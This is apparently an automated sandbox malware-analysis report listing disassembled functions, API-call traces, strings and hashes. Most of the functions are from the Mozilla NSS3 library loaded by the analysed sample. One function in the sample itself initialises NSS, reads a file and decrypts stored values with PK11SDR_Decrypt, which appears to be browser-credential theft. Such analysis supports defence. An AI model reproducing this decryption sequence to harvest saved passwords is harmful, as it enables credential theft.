Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408D7
Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408FB

TlsGetValue.KERNEL32 ref: 6C994DD7
EnterCriticalSection.KERNEL32(?), ref: 6C994DEC
PR_Unlock.NSS3(?), ref: 6C994E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C994E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C994E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C994E71
free.MOZGLUE(00000000), ref: 6C994E7A
PR_Unlock.NSS3(?), ref: 6C994EA2
TlsGetValue.KERNEL32 ref: 6C994EC1
EnterCriticalSection.KERNEL32(?), ref: 6C994ED6
PR_Unlock.NSS3(?), ref: 6C994F01
free.MOZGLUE(00000000), ref: 6C994F2A

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 1a1f22ba19049b95d14d889cbbabeff08d172c9e40c66e4fb280c36f9a50e259
Instruction ID: 8936d61810c25cbd821ee60939afe583fb62cd3742e8afc090bb404a7a4a2baa
Opcode Fuzzy Hash: 1a1f22ba19049b95d14d889cbbabeff08d172c9e40c66e4fb280c36f9a50e259
Instruction Fuzzy Hash: 24B10475A002069FEB06EF68D844BAA77B8BF19318F088124ED2597B10E735E965CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C95C4B0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C95C4D5

Part of subcall function 6C9ABE30: SECOID_FindOID_Util.NSS3(6C96311B,00000000,?,6C96311B,?), ref: 6C9ABE44

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C95C516
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C95C530
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C95C54E
NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6C95C5CB
VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6C95C712
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C95C725
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C95C742
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C95C751
PL_FinishArenaPool.NSS3(?), ref: 6C95C77A
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C95C78F
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C95C7A9

Strings

security, xrefs: 6C95C63F

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
String ID: security
API String ID: 1085474831-3315324353
Opcode ID: f4a562d6b5e9b97599f3846a9d5f035db7dafaa3b0fe0b93f0d631569288002b
Instruction ID: f1c81121982e56cf752e62e2351298552dd373fab400560f1a61153e1b67fc22
Opcode Fuzzy Hash: f4a562d6b5e9b97599f3846a9d5f035db7dafaa3b0fe0b93f0d631569288002b
Instruction Fuzzy Hash: B7811B71C05109ABEF00EA94DC80BEF7778DF1930CF944125E901A6E91E731EA69CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0040C100 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0040C112

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02F652D8,00000000,?,0041DBAC,00000000,?,?), ref: 0040C1D6
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C1F3
GetFileSize.KERNEL32(00000000,00000000), ref: 0040C1FF
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040C212

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040C242
StrStrA.SHLWAPI(?,02F65230,0041D72E), ref: 0040C260
StrStrA.SHLWAPI(00000000,02F65158), ref: 0040C287
StrStrA.SHLWAPI(?,02F658D0,00000000,?,0041DBB8,00000000,?,00000000,00000000,?,02F61A80,00000000,?,0041DBB4,00000000,?), ref: 0040C405
StrStrA.SHLWAPI(00000000,02F65A70), ref: 0040C41C

Part of subcall function 0040BF90: memset.MSVCRT ref: 0040BFC3
Part of subcall function 0040BF90: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02F619E0), ref: 0040BFE1
Part of subcall function 0040BF90: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
Part of subcall function 0040BF90: PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
Part of subcall function 0040BF90: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
Part of subcall function 0040BF90: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
Part of subcall function 0040BF90: memcpy.MSVCRT ref: 0040C082
Part of subcall function 0040BF90: PK11_FreeSlot.NSS3(?), ref: 0040C0D1

StrStrA.SHLWAPI(?,02F65A70,00000000,?,0041DBBC,00000000,?,00000000,02F619E0), ref: 0040C4BD
StrStrA.SHLWAPI(00000000,02F61A10), ref: 0040C4D4

Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8

lstrlen.KERNEL32(00000000), ref: 0040C5A7
CloseHandle.KERNEL32(00000000), ref: 0040C5F9
NSS_Shutdown.NSS3 ref: 0040C607

Strings

, xrefs: 0040C133

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmallocmemcpymemset
String ID:
API String ID: 2844179199-3916222277
Opcode ID: c251b2e1c2777a2feb96866a849bf03b0c8983f674b3dde2610894d3139916f7
Instruction ID: 16cc530deb27457f536659a64f134916331f5af867ee6c6bf2a367595298ef92
Opcode Fuzzy Hash: c251b2e1c2777a2feb96866a849bf03b0c8983f674b3dde2610894d3139916f7
Instruction Fuzzy Hash: 66E11075910208ABCB14EBA1DC91FEEBB79BF54304F41415EF10667191DF38AA86CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6C984CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C984CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C984D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C984D37

Part of subcall function 6CA6D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA6D963

PR_LogPrint.NSS3(?,00000000), ref: 6C984D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C984D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C984D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C984DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C984DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C984E20

Strings

hSession = 0x%x, xrefs: 6C984D12, 6C984D22
hObject = 0x%x, xrefs: 6C984D65, 6C984D75
(CK_INVALID_HANDLE), xrefs: 6C984D30, 6C984D83
pulSize = 0x%p, xrefs: 6C984DB7
*pulSize = 0x%x, xrefs: 6C984E1B
C_GetObjectSize, xrefs: 6C984CEE

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: e9f65bc760e662a6d27b16f9266d5e2ccb20c69db11f24f28aa7f7c1ae4f68f8
Instruction ID: be9ca0204aba02517de504f42923589879dab2f2f8294750dcf5275051c1fa1d
Opcode Fuzzy Hash: e9f65bc760e662a6d27b16f9266d5e2ccb20c69db11f24f28aa7f7c1ae4f68f8
Instruction Fuzzy Hash: 5D411671602205AFD704CF50ED98F9A7BBDBF5230DF048925E5096BA22DB30D889CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 6C9B6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6CA81DE0,?), ref: 6C9B6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9B6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C9B6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C9B6D82
DER_GetInteger_Util.NSS3(?), ref: 6C9B6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C9B6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C9B6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C9B6F19
PK11_DigestBegin.NSS3(00000000), ref: 6C9B6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C9B6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C9B7011
PK11_FreeSymKey.NSS3(00000000), ref: 6C9B7033
free.MOZGLUE(?), ref: 6C9B703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C9B7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C9B7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C9B70AF

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 9255c27bad90275707646bf49d01b9cdbf70c19bdff7e949494bc9f60fb46865
Instruction ID: d6e1631bc6a14d8911c6df1e620475a8ebfaa0e1c7266c81f2571cde57f89323
Opcode Fuzzy Hash: 9255c27bad90275707646bf49d01b9cdbf70c19bdff7e949494bc9f60fb46865
Instruction Fuzzy Hash: 1BA1E771904201BBEB088F24DC45B6B32A8DB9130CF248939F919EBB91E775F865C793

Uniqueness

Uniqueness Score: -1.00%

Function 6C9925D0 Relevance: 24.3, APIs: 16, Instructions: 284COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C96662E,?,?), ref: 6C99264E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C96662E,?,?), ref: 6C992670
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C96662E,?), ref: 6C992684
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C9926C2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C9926E0
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C9926F4
PR_Unlock.NSS3(?), ref: 6C99274D
PR_SetError.NSS3(00000000,00000000), ref: 6C9928A9

Part of subcall function 6C9A3440: PK11_GetAllTokens.NSS3 ref: 6C9A3481
Part of subcall function 6C9A3440: PR_SetError.NSS3(00000000,00000000), ref: 6C9A34A3
Part of subcall function 6C9A3440: TlsGetValue.KERNEL32 ref: 6C9A352E
Part of subcall function 6C9A3440: EnterCriticalSection.KERNEL32(?), ref: 6C9A3542
Part of subcall function 6C9A3440: PR_Unlock.NSS3(?), ref: 6C9A355B

PR_Unlock.NSS3(?), ref: 6C9927A1
PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C96662E,?,?,?), ref: 6C9927B5
PR_Unlock.NSS3(?), ref: 6C9927CE
TlsGetValue.KERNEL32 ref: 6C9927E8
EnterCriticalSection.KERNEL32(0000001C), ref: 6C992800

Part of subcall function 6C99F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C99F854
Part of subcall function 6C99F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C99F868
Part of subcall function 6C99F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C99F882
Part of subcall function 6C99F820: free.MOZGLUE(04C483FF,?,?), ref: 6C99F889
Part of subcall function 6C99F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C99F8A4
Part of subcall function 6C99F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C99F8AB
Part of subcall function 6C99F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C99F8C9
Part of subcall function 6C99F820: free.MOZGLUE(280F10EC,?,?), ref: 6C99F8D0

PR_Unlock.NSS3(?), ref: 6C992834
TlsGetValue.KERNEL32 ref: 6C99284E
EnterCriticalSection.KERNEL32(0000001C), ref: 6C992866

Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407AD
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407CD
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407D6
Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C8D204A), ref: 6C9407E4
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,6C8D204A), ref: 6C940864
Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C940880
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,6C8D204A), ref: 6C9408CB
Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408D7
Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408FB

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Value$CriticalSection$Unlock$Enterfree$DeleteError$K11_calloc$ImportPublicTokens
String ID:
API String ID: 544520609-0
Opcode ID: adca67271d13a5b72883917e16e1111bd33bfbeddd1f28a892c2a790d248bb4f
Instruction ID: ec5db103146cf4222a1dffa13a0cbfe32716006cd7f02f7304c752f5503bf79a
Opcode Fuzzy Hash: adca67271d13a5b72883917e16e1111bd33bfbeddd1f28a892c2a790d248bb4f
Instruction Fuzzy Hash: 4CB1E574D00706DFEB00DF69D888BAAB7B8FF19308F188529D915A7B11E731E945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040FAE0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 145stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 0040FB05
ExitProcess.KERNEL32 ref: 0040FB11
strtok_s.MSVCRT ref: 0040FB28

Strings

block, xrefs: 0040FAF7

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 5aaf34a2caa88f06c2b9c4fcf3d4ffa84596d47c58685c8ea530080989fa9c66
Instruction ID: 7825bcbe27da9618b603611e1cfecd621835b499ad6dca7fa43ef563d7fd58f0
Opcode Fuzzy Hash: 5aaf34a2caa88f06c2b9c4fcf3d4ffa84596d47c58685c8ea530080989fa9c66
Instruction Fuzzy Hash: 0F514074A08209EFDB20DFA1D955BAE77B5BF44305F10807AE802B76C0D778E985CB59

Uniqueness

Uniqueness Score: -1.00%

Function 6CA2A4C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CA2A4E6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CA2A4F9
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA2A553
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CA2A5AC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA2A5F7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA2A60C
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA2A633
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA2A671
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CA2A69A

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA2A61D, 6CA2A68B, 6CA2A6B3
%s at line %d of [%.10s], xrefs: 6CA2A62C
database corruption, xrefs: 6CA2A627

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2358773949-598938438
Opcode ID: 5b699a0b782f72f7d0a440467ad75e499d86d4f0364d99e6c62d69d20695e6e0
Instruction ID: 21d77432383c08cb6554189a3dac090ebcb81136516c505556ff9f2aa8aac06d
Opcode Fuzzy Hash: 5b699a0b782f72f7d0a440467ad75e499d86d4f0364d99e6c62d69d20695e6e0
Instruction Fuzzy Hash: D05193B1908311AFDB019F25D980A9B7BE2AF44718F0C886DF84987A51F735DDD8CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C9545B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,6C951984,?), ref: 6C9545F2
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C9545FB

Part of subcall function 6C9B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C9B08B4

SECITEM_CompareItem_Util.NSS3(00000000,-00000001), ref: 6C95461E

Part of subcall function 6C9AFCB0: memcmp.VCRUNTIME140(?,8B0B74C0,04C6831E,?,00000000,?,6C954101,00000000,?,?,?,6C951666,?,?), ref: 6C9AFCF2

SECITEM_CopyItem_Util.NSS3(00000000,?,-00000019), ref: 6C954646
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C954662
PR_SetError.NSS3(FFFFE023,00000000), ref: 6C95467A
PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0), ref: 6C954691
PL_FreeArenaPool.NSS3 ref: 6C9546A3
PL_FinishArenaPool.NSS3 ref: 6C9546AB
free.MOZGLUE(?), ref: 6C9546BC
PORT_ZAlloc_Util.NSS3(?), ref: 6C9546E5
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C954717

Strings

security, xrefs: 6C9545EC

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Util$ArenaItem_Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_freememcmpmemcpy
String ID: security
API String ID: 3482804875-3315324353
Opcode ID: 4294d4323d484cf04a7bdf3178f3397db0345f86548169474cbfe8bfd3d7e20e
Instruction ID: 7424c6786ba66bb3e8d13ce17f208ca0bc52de817db620fd53835585c4d90232
Opcode Fuzzy Hash: 4294d4323d484cf04a7bdf3178f3397db0345f86548169474cbfe8bfd3d7e20e
Instruction Fuzzy Hash: B44104B29063106BE740CB659C44B5B77ECAF9825CF450A29EC19A3B81E731E534CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 6C9CAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9CADB1

Part of subcall function 6C9ABE30: SECOID_FindOID_Util.NSS3(6C96311B,00000000,?,6C96311B,?), ref: 6C9ABE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C9CADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C9CAE08

Part of subcall function 6C9AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA818D0,?), ref: 6C9AB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C9CAE25
PL_FreeArenaPool.NSS3 ref: 6C9CAE63
PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0), ref: 6C9CAE4D

Part of subcall function 6C8D4C70: TlsGetValue.KERNEL32(?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4C97
Part of subcall function 6C8D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4CB0
Part of subcall function 6C8D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9CAE93
PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0), ref: 6C9CAECC
PL_FreeArenaPool.NSS3 ref: 6C9CAEDE
PL_FinishArenaPool.NSS3 ref: 6C9CAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9CAEF5
